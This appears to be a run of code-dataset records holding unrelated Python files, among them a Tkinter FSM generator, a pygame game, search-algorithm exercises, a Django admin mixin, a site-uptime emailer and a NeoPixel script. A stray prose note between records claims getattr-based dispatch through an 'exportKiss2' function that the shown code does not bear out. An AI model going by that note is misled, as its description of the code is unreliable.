FSM\")\n\n def 
radio_action(self):\n # method_name = \"fsm_\" + str(self.v.get())\n # method = getattr(self, method_name)\n # return method()\n if self.v.get() == 3:\n self.memo[1].config(text='Number of patterns')\n self.memo[3].config(text='Max pattern length')\n else :\n self.memo[1].config(text='Output (bits)')\n self.memo[3].config(text='Number of states')\n\n\n def fsm_1(self):\n\n r = self.results\n x = FSM(\n seed=r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(random)\n x.kiss2(r[\"path\"].get())\n\n def fsm_2(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n jumps=r[\"jumps\"].get(),\n loops=r[\"loops\"].get())\n x.build(sequential)\n x.kiss2(r[\"path\"].get())\n\n def fsm_3(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.kiss2(r[\"path\"].get())\n\n def image_1(self):\n r = self.results\n x = FSM(\n seed=r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(random)\n x.image(r[\"path\"].get())\n\n def image_2(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n jumps=r[\"jumps\"].get(),\n loops=r[\"loops\"].get())\n x.build(sequential)\n x.image(r[\"path\"].get())\n\n def image_3(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.image(r[\"path\"].get())\n\n\nroot = Tk()\nroot.geometry(\"650x350\")\nroot.title(\"FSpyChine -- Developed by Antonio Segura Cano\")\n\napp = App(root)\n\nroot.mainloop()","sub_path":"src/FSM_gui.py","file_name":"FSM_gui.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
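exportKiss2, image and the fsm_*/image_* methods above communicate only through getattr on the radio value, so adding a fourth generator just means defining fsm_4 and image_4. The dispatch idiom in miniature:

class Dispatcher(object):
    def action_1(self):
        return 'random build'

    def action_2(self):
        return 'sequential build'

    def run(self, choice):
        # resolve 'action_<choice>' at call time, as exportKiss2 does
        return getattr(self, 'action_{}'.format(choice))()

print(Dispatcher().run(2))  # sequential build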
+{"seq_id":"109598394","text":"import pygame, sys\nfrom pygame.locals import*\nfrom Person import *\nfrom Wall import *\nfrom Wall2 import *\nfrom Anvil import *\n\n# Creates a screen that is 800 x 600\npygame.init()\nscreen = pygame.display.set_mode((800, 600))\n\ndisplay_width = 800\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width,display_height))\n\n# Every 100 milliseconds check if a key is still pressed down\n# Allows user to hold down the key to move\npygame.key.set_repeat(60, 60)\n\n# create a person at position (40,40)\nguy = Person(350, 550)\ntheWall = Wall(150, 150)\ntheWall2 = Wall2(0,150)\ntheAnvil = Anvil(50, 500)\n\n# A list that keeps track of the areas of screen that have changed\nchangedRecs = []\n\n# draw the starting screen\nWHITE = (0,90,40)\nblack = (0, 0, 0)\nscreen.fill(WHITE)\ntheWall.draw(screen)\ntheWall2.draw(screen)\ntheAnvil.draw(screen)\npygame.display.update()\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\ndef message_display(text):\n largeText = pygame.font.Font('freesansbold.ttf',115)\n TextSurf, TextRect = text_objects(text, largeText)\n TextRect.center = ((display_width/2),(display_height/2))\n gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n\nwhile True:\n # draw the scene\n screen.fill(WHITE)\n theWall.draw(screen)\n theWall2.draw(screen)\n theAnvil.draw(screen)\n guy.draw(screen)\n\n # adds the current position of guy to the areas that have been changed\n changedRecs.append(guy.getRec())\n\n # update only the changed areas of the screen\n pygame.display.update(changedRecs)\n\n # check all events\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n elif event.type == KEYDOWN:\n # add the old position of guy to the areas of guy that have been changed\n changedRecs.append(guy.getRec())\n # move according to the key pressed. If it hits the wall, move the opposite direction\n #if event.key == K_UP:\n # guy.moveUp()\n #if guy.collide(theWall):\n # guy.moveDown()\n\n #elif event.key == K_DOWN:\n # guy.moveDown()\n #if guy.collide(theWall):\n #guy.moveUp()\n\n if event.key == K_LEFT:\n guy.moveLeft()\n if guy.collide(theWall):\n guy = Person(750, 550)\n elif guy.collide(theWall2):\n guy.guy = Person(750, 550)\n\n elif event.key == K_RIGHT:\n guy.moveRight()\n if guy.collide(theWall):\n guy = Person(0, 550)\n elif guy.collide(theWall2):\n guy = Person(0, 550)\n\n if guy.collide(theAnvil):\n message_display('You Died')\n #endgame dont spoil\n\n\n#https://github.com/brendangregg/GuessingGame/blob/master/src/guess.bash\n","sub_path":"WallRunner.py","file_name":"WallRunner.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"566988177","text":"import search\nfrom search import (breadth_first_tree_search,\n breadth_first_search,\n depth_first_graph_search,\n iterative_deepening_search,\n depth_limited_search,\n recursive_best_first_search)\nfrom utils import (name, print_table)\n\n\nclass BoardProblem(search.Problem):\n # MOVES\n MOVE_RIGHT = {'id': 0, 'value': 1}\n MOVE_LEFT = {'id': 1, 'value': -1}\n JUMP_RIGHT = {'id': 2, 'value': 1}\n JUMP_LEFT = {'id': 3, 'value': -1}\n\n # THE STATE IS A STRING OF CHARACTERS\n # Each character represents a piece, it can be W, B or a space.\n state = \"\"\n\n # ACTIONS\n # Each action is represented by a tuple of two components:\n # - The piece that makes the action\n # - The move that the piece is making\n #\n # For example, the tuple (1,0) with the following state: \"WB BB\"\n # means that the black piece of the left has to move to its right.\n\n # The result function executes the given action to the current state\n # and returns the result of that action.\n def result(self, state, action):\n if action[1] in (self.MOVE_RIGHT, self.MOVE_LEFT):\n return self.move(state, action[0], action[1])\n elif action[1] in (self.JUMP_RIGHT, self.JUMP_LEFT):\n return self.jump(state, action[0], action[1])\n else:\n raise AttributeError\n\n # The move function moves the given piece to the given direction\n def move(self, state, piece, direction):\n char_list = list(state)\n char = char_list[piece]\n char_list[piece] = ' '\n char_list[piece + direction['value']] = char\n return ''.join(char_list)\n\n # The jump function makes the piece to jump to the given direction\n # getting the target between the old site and the new one and it\n # swaps its color.\n def jump(self, state, piece, direction):\n char_list = list(state)\n char = char_list[piece]\n char_list[piece] = ' '\n for i in (1, 2):\n char_list[piece + i * direction['value']] = char\n return ''.join(char_list)\n\n # The actions function returns all possible moves that all pieces\n # can make in the given state.\n def actions(self, state):\n char_list = list(state)\n actions = []\n # As the only possible moves are near the spaces, these will become\n # the guides for the possible actions, checking the possible moves of\n # the nearer pieces (-2,-1,+1,+2).\n last_space_index = 0\n for _ in range(char_list.count(' ')):\n space_index = char_list.index(' ', last_space_index)\n for near_position in [-2, -1, 1, 2]:\n for move in self.moves(state, space_index, near_position):\n actions.append(move)\n last_space_index = space_index\n return actions\n\n # The moves function returns all possible moves and jumps of a given piece\n # position relative to the space_index in the given state\n # It checks if the piece can move or jump to the space, if so, it returns\n # the move or jump as an action\n def moves(self, state, space_index, near_position):\n moves = []\n piece = space_index + near_position\n if piece in range(len(state)):\n if near_position == -2 and not self.is_last_black(state, piece, self.JUMP_RIGHT):\n # It's a jump from the left and it's not the same color\n moves.append((piece, self.JUMP_RIGHT)) # So we make the piece to jump to the right\n\n elif near_position == -1: # It's a move from the left\n moves.append((piece, self.MOVE_RIGHT)) # So we make the piece to move to the right\n\n elif near_position == 1: # It's a move from the right\n moves.append((piece, self.MOVE_LEFT)) # So we make the piece to move to the left\n\n elif near_position == 2 and not self.is_last_black(state, piece, self.JUMP_LEFT):\n # It's a jump 
from the right and it's not the same color\n moves.append((piece, self.JUMP_LEFT)) # So we make the piece to jump to the left\n return moves\n\n # The last_black function returns true if the piece that is jumped over is the last black piece in the board\n def is_last_black(self, state, piece, jump):\n return state.count(\"B\") == 1 and state[piece + jump['value']] == \"B\"\n\n # The value function returns the value of the current state\n def value(self, state):\n return state.count(self.goal['char'])\n\n # The goal_test function tests if the given state is a solution or it\n # has to still searching for it.\n def goal_test(self, state):\n return self.value(state) == self.goal['cant']\n\n # The path_cost function gets the cost of the action made from state1\n # to state2.\n def path_cost(self, c, state1, action, state2):\n return 1\n\n def h(self, node):\n return node.state.count(self.goal['h'])\n\n\nclass InstrumentedBoardProblem(search.InstrumentedProblem):\n moves = [\"moves right\", \"moves left\", \"jumps right\", \"jumps left\"]\n def __init__(self, problem):\n super().__init__(problem)\n self.final_solution = None\n\n def __repr__(self):\n repr_final_solution = \"\"\n for node in self.final_solution:\n repr_final_solution += \"Piece {} {}. \".format(node[0], self.moves[node[1]['id']])\n return '<{:4d}/{:4d}/{:4d}/{}/{}>'.format(self.succs, self.goal_tests,\n self.states, repr_final_solution, str(self.found))\n\n\ndef compare_searchers(problems, header,\n searchers=[breadth_first_tree_search,\n breadth_first_search,\n depth_first_graph_search,\n iterative_deepening_search,\n depth_limited_search,\n recursive_best_first_search]):\n def do(searcher, problem):\n p = InstrumentedBoardProblem(problem)\n solution = searcher(p)\n p.final_solution = solution.solution()\n return p\n table = [[name(s)] + [do(s, p) for p in problems] for s in searchers]\n print_table(table, header)","sub_path":"assignment1_classes.py","file_name":"assignment1_classes.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
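A usage sketch of the board problem, assuming search.Problem stores its first constructor argument as self.initial and that goal is supplied as the dict that value, goal_test and h read (keys 'char', 'cant' and 'h'):

problem = BoardProblem('WWW BB')
problem.goal = {'char': 'B', 'cant': 2, 'h': 'W'}  # solved once both B pieces survive
print(problem.actions('WWW BB'))  # every legal (piece, move) tuple around the space
print(problem.result('WWW BB', (2, BoardProblem.MOVE_RIGHT)))  # 'WW WBB'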
+{"seq_id":"602876483","text":"\" 99. Recover Binary Search Tree\"\n\"\"\"\nTwo elements of a binary search tree (BST) are swapped by mistake.\n\nRecover the tree without changing its structure.\n\nNote:\nA solution using O(n) space is pretty straight forward. Could you devise a constant space solution?\nSubscribe to see which companies asked this question\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n \"inOrder search\"\n def __init__(self):\n self.errA = None\n self.errB = None\n self.pre = None\n \n def recoverHelper(self,root):\n if root == None:\n return\n self.recoverHelper(root.left)\n if self.pre != None:\n if self.pre.val > root.val:\n if self.errA == None:\n self.errA = self.pre\n self.errB = root\n else:\n self.errB = root\n self.pre = root\n self.recoverHelper(root.right)\n return\n \n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None: return\n self.recoverHelper(root)\n if self.errA != None and self.errB != None:\n self.errA.val, self.errB.val = self.errB.val, self.errA.val\n return\n","sub_path":"TreeBST/recoverBinarySearchTree.py","file_name":"recoverBinarySearchTree.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"390491175","text":"import collections\nfrom typing import Iterator, List\n\nfrom test_framework import generic_test\n\n\ndef examine_buildings_with_sunset(sequence: Iterator[int]) -> List[int]:\n # Keep all buildings that potentially have a view in a stack\n # Given a new building (west of all existing buildings), compare it with the top of the stack\n # If the new building is taller than the top of the stack building, then pop the top of the stack building\n # Do this until the top of the stack is taller, then push the new building onto the stack\n # Essentially, the stack is in an increasing order of height, from West to East\n # Finally, return the stack in reversed order (i.e., starting from the East (tallest))\n\n BuildingWithHeight = collections.namedtuple('BuildingWithHeight',\n ('idx', 'height'))\n\n candidates = []\n\n for idx, height in enumerate(sequence):\n while candidates and height >= candidates[-1].height:\n candidates.pop()\n candidates.append(BuildingWithHeight(idx, height))\n\n return [c.idx for c in reversed(candidates)]\n\n\ndef examine_buildings_with_sunset_wrapper(sequence):\n return examine_buildings_with_sunset(iter(sequence))\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('sunset_view.py', 'sunset_view.tsv',\n examine_buildings_with_sunset))\n","sub_path":"epi_judge_python/sunset_view.py","file_name":"sunset_view.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"195053017","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom functools import wraps\n\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.template.response import SimpleTemplateResponse\nfrom django.urls import reverse\nfrom django.utils.http import urlencode\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom ..admin.base import registered_admins, WeChatModelAdmin\nfrom ..models import WeChatApp\nfrom ..models.permission import get_user_permissions\nfrom ..utils.admin import get_request_params\nfrom .wechat import default_site as default_wechat_site\n\n\ndef wechat_admin_view(view, site):\n \"\"\"装饰WeChatAdmin中的view\n 在请求上附上WeChatApp实例\n 并在响应的模板上附上app,app_id等context\n \"\"\"\n @wraps(view)\n def decorated_func(request, *args, **kwargs):\n model_admin = getattr(view, \"__self__\", None)\n\n # 从请求中获取app,附在request上\n app = None\n app_id = get_request_params(request, \"app_id\")\n if app_id:\n try:\n app = site.wechat_site.app_queryset.get(id=app_id)\n except WeChatApp.DoesNotExist:\n pass\n request.app_id = app_id\n request.app = app\n\n rv = view(request, *args, **kwargs)\n\n # 更新response的context\n if isinstance(rv, SimpleTemplateResponse):\n if rv.context_data is None:\n rv.context_data = dict()\n rv.context_data.update(\n app=app,\n app_id=app_id\n )\n\n return rv\n\n return decorated_func\n\n\nclass WeChatAdminSiteMixin(object):\n \"\"\"AdminSiteMixin 自定义后台需要包含微信相关功能时 需要将本Mixin混入\"\"\"\n _default_wechat_site = default_wechat_site\n\n def __init__(self, *args, **kwargs):\n super(WeChatAdminSiteMixin, self).__init__(*args, **kwargs)\n for model, admin_class in registered_admins:\n self.register(model, admin_class)\n\n @property\n def wechat_site(self):\n \"\"\"默认微信站点,在获取app queryset时与做url reverse时需使用\n\n :rtype: wechat_django.WeChatSite\n \"\"\"\n return self._default_wechat_site\n\n def admin_view(self, view, cacheable=False):\n model_admin = getattr(view, \"__self__\", None)\n\n if isinstance(model_admin, WeChatModelAdmin):\n view = wechat_admin_view(view, self)\n\n return super(WeChatAdminSiteMixin, self).admin_view(view, cacheable)\n\n def get_urls(self):\n rv = super(WeChatAdminSiteMixin, self).get_urls()\n\n wechat_app_index = wechat_admin_view(self.wechat_index, self)\n rv += [\n url(\n r\"(?Pwechat_django)/apps/(?P\\d+)/$\",\n self.admin_view(wechat_app_index),\n name=\"wechat_funcs_list\"\n )\n ]\n\n return rv\n\n def _build_app_dict(self, request, label=None):\n rv = super(WeChatAdminSiteMixin, self)._build_app_dict(request, label)\n\n if not label:\n # 首页 追加app列表\n app_dict = self._build_wechat_app_dict(request)\n if app_dict[\"has_module_perms\"]:\n rv[\"wechat_django_apps\"] = app_dict\n elif not rv:\n pass\n elif label == \"wechat_django\":\n app_id = request.resolver_match.kwargs.get(\"app_id\")\n if app_id:\n # 公众号首页,各管理菜单\n for model in rv[\"models\"]:\n if model[\"perms\"].get(\"change\") and model.get(\"admin_url\"):\n model['admin_url'] += \"?\" + urlencode(dict(app_id=app_id))\n if model[\"perms\"].get(\"add\") and model.get(\"add_url\"):\n query = urlencode(dict(\n _changelist_filters=urlencode(dict(\n app_id=app_id\n ))\n ))\n model['add_url'] += \"?\" + query\n else:\n # 原始菜单(只有app管理)\n pass\n\n return rv\n\n def _build_wechat_app_dict(self, request):\n \"\"\"构建wechat app列表菜单\"\"\"\n query = self.wechat_site.app_queryset\n if not request.user.is_superuser:\n perms = get_user_permissions(request.user)\n allowed_apps = {\n k for k, ps in perms.items() if ps != {\"manage\"}\n }\n query 
= query.filter(name__in=allowed_apps)\n        apps = query.all()\n        app_perms = [\n            dict(\n                name=str(app),\n                object_name=app.name,\n                perms=dict(\n                    change=True,\n                ),\n                admin_url=reverse(\n                    'admin:wechat_funcs_list',\n                    current_app=self.name,\n                    kwargs=dict(\n                        app_id=app.id,\n                        app_label=\"wechat_django\"\n                    )\n                )\n            )\n            for app in apps\n        ]\n        return {\n            'name': _(\"WeChat apps\"),\n            'app_label': \"wechat_django\",\n            # 'app_url': \"#\", # TODO: fix app_url\n            'has_module_perms': bool(app_perms),\n            'models': app_perms,\n        }\n\n    def wechat_index(self, request, *args, **kwargs):\n        \"\"\"Admin index page for a single WeChat official account\"\"\"\n        kwargs.pop(\"app_id\", None)\n        return super(WeChatAdminSiteMixin, self).app_index(\n            request, *args, **kwargs)\n\n\nclass WeChatAdminSite(WeChatAdminSiteMixin, admin.AdminSite):\n    pass\n\n\ndef patch_admin():\n    \"\"\"Replace Django's builtin default admin site with wechat-django's default admin site\"\"\"\n    setattr(admin.sites, \"site\", default_site)\n    setattr(admin, \"site\", default_site)\n\n\ndefault_site = WeChatAdminSite()\ndefault_site._registry.update(admin.sites.site._registry)\n","sub_path":"wechat_django/sites/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
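The route registered in get_urls relies on regex named groups to feed app_label and app_id into the view kwargs; how such a pattern captures, in isolation:

import re

pattern = re.compile(r"(?P<app_label>wechat_django)/apps/(?P<app_id>\d+)/$")
print(pattern.match("wechat_django/apps/42/").groupdict())
# {'app_label': 'wechat_django', 'app_id': '42'}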
+{"seq_id":"164040643","text":"import requests\nimport smtplib\n\n#python3 -m venv monitorUrl if don't have python3-venv installed then you should install it by\n#typing sudo apt install python3-venv\n#source monitorUrl/bin/activate\n#pip install requests\n#wrote by me, myself and i. Lotervik :P\n\ndef notificationMail():\n with smtplib.SMTP('smtp.gmail.com', 587) as smtp:\n smtp.ehlo()\n smtp.starttls() # crypter le traffic\n smtp.ehlo()\n\n smtp.login(adressmail, mdp)\n subject = 'Your Site is down'\n body = 'nanani nanana '\n msg = f'Subject: {subject}\\n\\n{body}'\n\n #smtp.sendmail(SENDER,RECEIVER, msg)\n smtp.sendmail(adressmail, adressmail, msg)\n\n\n\nadressmail = \"yourgmail@gmail.com\"\nmdp = \"yourmdp\"\n\ntry:\n # 5s le temps d attente , si le site ne repond pas ==> exception\n r = requests.get(\"https://www.google.com/\", timeout=5)\n if r.status_code != 200:\n # https://myaccount.google.com/lesssecureapps\n #notificationMail()\n print(\"your site is down\")\n else : print(\"mcha\")\n\nexcept Exception as e:\n #notificationMail()\n print(\"your site is down\")\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"217256901","text":"import JavPy.sources # do not remove this line\nfrom JavPy.functions.sources import Sources\nfrom JavPy.functions.actress_translate import ActressTranslate\nfrom JavPy.functions.history_names import HistoryNames\nfrom JavPy.utils.requester import submit, wait_until\nfrom JavPy.functions.actress_info import ActressInfo\nfrom JavPy.functions.datastructure import Actress\n\n\nclass SearchByActress:\n @staticmethod\n def __guess_lang(text):\n if all(map(lambda c: ord(c) < 128, text)):\n lang = \"en\"\n\n else:\n if any(map(lambda c: 0x0800 <= ord(c) <= 0x4E00, text)):\n lang = \"jp\"\n else:\n lang = \"zh\"\n\n return lang\n\n @classmethod\n def search(cls, actress, up_to, with_profile=False):\n lang = cls.__guess_lang(actress)\n\n if lang == \"en\":\n actress = ActressTranslate.translate2jp(actress)\n if actress:\n videos = [\n submit(source.search_by_actress, actress, up_to)\n for source in Sources.SearchByActress\n ]\n if with_profile:\n profile = submit(ActressInfo.get_actress_info, actress)\n names = submit(HistoryNames.get_history_names, actress)\n names = names.result()\n profile = profile.result()\n print(profile)\n if profile is None:\n profile = Actress()\n profile.other[\"history_names\"] = names\n else:\n profile.other[\"history_names\"] = list(\n set(names).union(set(profile.other[\"history_names\"]))\n )\n return wait_until(videos), profile\n else:\n return wait_until(videos), None\n\n return [], None\n\n\nif __name__ == \"__main__\":\n print(SearchByActress.search(\"桃乃木かな\", None, True))\n","sub_path":"JavPy/functions/search_by_actress.py","file_name":"search_by_actress.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"457086395","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 13 07:21:10 2021\n\n@author: Rudra\n\"\"\"\n\nimport os\nimport sys\nimport pickle\nimport pprint\nimport argparse\n\n\ndef join_str(*args):\n out_str = ''\n for idx, ele in enumerate(args):\n str_add = ele\n if idx != (len(args)-1):\n str_add += '_'\n out_str += str_add\n return out_str\n\n\nsys.path.append('..')\n\ndefault_repo = '/home/rsk3900/Documents/Python_Scripts/multiset_gaze/src'\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--path_exp_tree',\n default='/results/test_results_blank_folders',\n help='path to create blank test results folder',\n type=str)\nparser.add_argument('--path_results',\n default='/results',\n help='path to all experiments results')\nparser.add_argument('--mode', type=str, default='one_vs_one',\n help='mode you want to test out')\nparser.add_argument('--path_acc_results',\n default='/results/multiset_accumulated_results',\n help='path to accumulate all results',\n type=str)\nparser.add_argument('--path_data',\n default='/data/datasets/All',\n help='path to all H5 file data',\n type=str)\nparser.add_argument('--exp_cond',\n default='AUG-1_GRADREV-0_UNCERTAIN-1_ADA_IN_NORM-0_IN_NORM-1',\n help='exact exp condition you want results for',\n type=str)\nparser.add_argument('--local_rank', type=int, default=0,\n help='rank to set GPU')\nparser.add_argument('--batch_size', type=int, default=32,\n help='testing batchsize')\nparser.add_argument('--repo_root', type=str,\n default=default_repo,\n help='path to repo root')\nparser.add_argument('--save_test_maps',\n action='store_true',\n help='save out test maps')\n\nargs = parser.parse_args()\nargs = vars(args)\npprint.pprint(args)\n\nDS_selections = pickle.load(open('./cur_objs/dataset_selections.pkl', 'rb'))\nDS_present = list(DS_selections['train'].keys())\n\ntrain_itr_list = ['all_vs_one'] if args['mode'] == 'all_vs_one' else DS_present\n\nfor train_ds in train_itr_list:\n for test_ds in DS_present:\n\n print('----------------------')\n print('Mode: {}'.format(args['mode']))\n print('Trained on: {}'.format(train_ds))\n print('Test on: {}'.format(test_ds))\n\n exp_name = join_str('RESULT',\n args['mode'],\n 'TRAIN',\n train_ds,\n 'TEST',\n test_ds,\n args['exp_cond'])\n\n path_to_find_model = os.path.join(args['path_results'],\n args['mode'],\n args['exp_cond'],\n )\n\n possible_paths = []\n for path in os.listdir(path_to_find_model):\n if (train_ds in path):\n possible_paths.append(path)\n\n assert len(possible_paths) <= 1, 'only one such model must exist'\n\n if (possible_paths):\n path_model = os.path.join(path_to_find_model,\n possible_paths[0],\n 'results',\n 'best_model.pt')\n\n path_acc_results = os.path.join(args['path_acc_results'],\n args['mode'],\n args['exp_cond'])\n\n run_cmd = 'python run.py '\n run_cmd += '--repo_root=%s ' % args['repo_root']\n run_cmd += '--path_data=%s ' % args['path_data']\n run_cmd += '--path_model=%s ' % path_model\n run_cmd += '--cur_obj=%s ' % test_ds # Set test cur obj\n run_cmd += '--path_exp_tree=%s ' % args['path_exp_tree']\n run_cmd += '--save_results_here=%s ' % (path_acc_results+'/'+exp_name+'.pkl')\n run_cmd += '--exp_name=%s ' % exp_name\n run_cmd += '--local_rank=%d ' % args['local_rank']\n run_cmd += '--batch_size=%d ' % args['batch_size']\n run_cmd += '--workers=4 '\n run_cmd += '--only_test=1 '\n run_cmd += '--use_instance_norm=1 '\n run_cmd += '--use_ada_instance_norm=0 '\n\n if not os.path.exists(path_acc_results+'/'+exp_name+'.pkl'):\n os.system(run_cmd)\n else:\n 
print('DONE!')\n print(run_cmd)\n","sub_path":"ritnet/Ellseg_v2/accumulate_results.py","file_name":"accumulate_results.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
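join_str underscore-joins its arguments; it is how every RESULT_* experiment name above is assembled. For example:

print(join_str('RESULT', 'one_vs_one', 'TRAIN', 'DS1', 'TEST', 'DS2'))
# RESULT_one_vs_one_TRAIN_DS1_TEST_DS2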
+{"seq_id":"642405696","text":"\n\n#calss header\nclass _RECAST():\n\tdef __init__(self,): \n\t\tself.name = \"RECAST\"\n\t\tself.definitions = [u'to change the form of something, or to change an actor in a play or film: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_recast.py","file_name":"_recast.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"250805992","text":"#########################################\n# NeoPixel.py\n# more info @: http://myrobotlab.org/service/NeoPixel\n#########################################\n\n#http://myrobotlab.org/service/NeoPixel\n#Submitted by calamity on Fri, 07/29/2016 - 15:39\n#The Neo Pixel are chainable, addressable leds hardware that can be controlled using only one signal wire.\n#The NeoPixel service allow you to connect and control an Neo Pixel hardware connected to an Arduino with MRL\n\n#Setup: \n#The NeoPixel hardware can connect to any pins on the arduino board, including analog pins\n#Note: Neopicel hardware can draw a lot of power (60mA for each pixels at full brightness). \n#If you are running big NeoPixel hardware, you should power it with external power source instead of the Arduino.\n\n \n# virtual = True\nport = \"COM7\"\n#port = \"/dev/ttyUSB0\"\n# optional but recommended neopixel connected on a dedicated arduino\nrxtxPort = \"Serial2\"\n \n# start optional virtual arduino service, used for internal test\nif ('virtual' in globals() and virtual):\n virtualArduino = Runtime.start(\"virtualArduino\", \"VirtualArduino\")\n virtualArduino.connect(port)\n# end used for internal test\n \n#Starting Arduino Service\narduino = Runtime.start(\"arduino\",\"Arduino\")\narduino.setBoardNano() #or setBoardMega() or arduino.setBoardUno() or .setBoardNano()\narduino.connect(port)\n \n#Starting NeoPixel Service\nneopixel = Runtime.start(\"neopixel\",\"NeoPixel\")\nneopixel.attach(arduino, 2, 24)\n \n#neopixel.attach(arduino, pin, number of pixel)\n#if ('virtual' in globals() and virtual):\n# #Attach Neopixel to main arduino\n# neopixel.attach(arduino, 2, 24)\n#else:\n# #Starting optional RX/TX connected slave arduino and Attach Neopixel to slave arduino\n# arduinoNano = Runtime.start(\"arduinoNano\",\"Arduino\")\n# arduinoNano.setBoardNano() #or arduino.setBoardUno()\n# arduinoNano.connect(arduino,rxtxPort)\n# neopixel.attach(arduinoNano, 2, 24)\n \n \n#Animations;\n#\"Color Wipe\"\n#\"Larson Scanner\"\n#\"Theater Chase\"\n#\"Theater Chase Rainbow\"\n#\"Rainbow\"\n#\"Rainbow Cycle\"\n#\"Flash Random\"\n#\"Ironman\"\n \n#speed: 1-65535 1=full speed, 2=2x slower than 1, 10=10x slower than 1\n#starting a animation\n#neopixel.setAnimation(\"Animation Name\", red, green, blue, speed)\n#neopixel.setAnimation(\"Theater Chase\", 255, 0, 0, 1) #running Theater Chase with color red at full speed\n\ndef lightupthering():\n\tneopixel.setAnimation(\"Theater Chase Rainbow\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Color Wipe\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Larson Scanner\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Theater Chase\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Rainbow\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Rainbow Cycle\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Flash Random\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Ironman\", 0, 
